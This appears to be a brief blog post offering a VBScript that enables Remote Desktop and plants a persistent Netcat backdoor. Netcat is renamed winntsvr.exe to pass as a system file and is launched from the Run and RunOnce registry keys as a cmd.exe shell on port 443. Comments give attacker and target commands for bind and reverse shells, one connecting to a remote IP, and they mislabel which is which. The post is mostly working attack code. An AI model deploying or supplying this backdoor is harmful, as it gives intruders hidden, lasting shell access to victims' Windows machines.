Here is an example of a VBScript that will Enable Remote Desktop and Plant Trojan or Backdoor (such as Netcat) or known as Persistent Netcat.
' This VBScript will do the following:
' 1. Enable Remote Desktop
' 2. Plant Trojan or Backdoor in the Registry
'
' Rename your Netcat (nc.exe) as winntsvr.exe as a "camouflage"
Dim objShell, RegLocate, RegLocate1
Set objShell = WScript.CreateObject("WScript.Shell")
On Error Resume Next
' Enable Remote Desktop
RegLocate = "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
objShell.RegWrite RegLocate,"0","REG_DWORD"
' Plant Trojan or Backdoor in the Registry
RegLocate =
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update"
objShell.RegWrite RegLocate,"C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe","REG_SZ"
RegLocate =
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update"
objShell.RegWrite RegLocate,"C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe","REG_SZ"
' Reverse Connect
' On the Target: winntsvr -v -L -p443 -d -e cmd.exe
' On the Attacker: nc -v 131.107.1.254 443
' Bind Connect
' On the Target: winntsvr -v 131.107.1.222 443 -d -e cmd.exe
' On the Attacker: nc -v -l -p443
WScript.Quit
No comments:
Post a Comment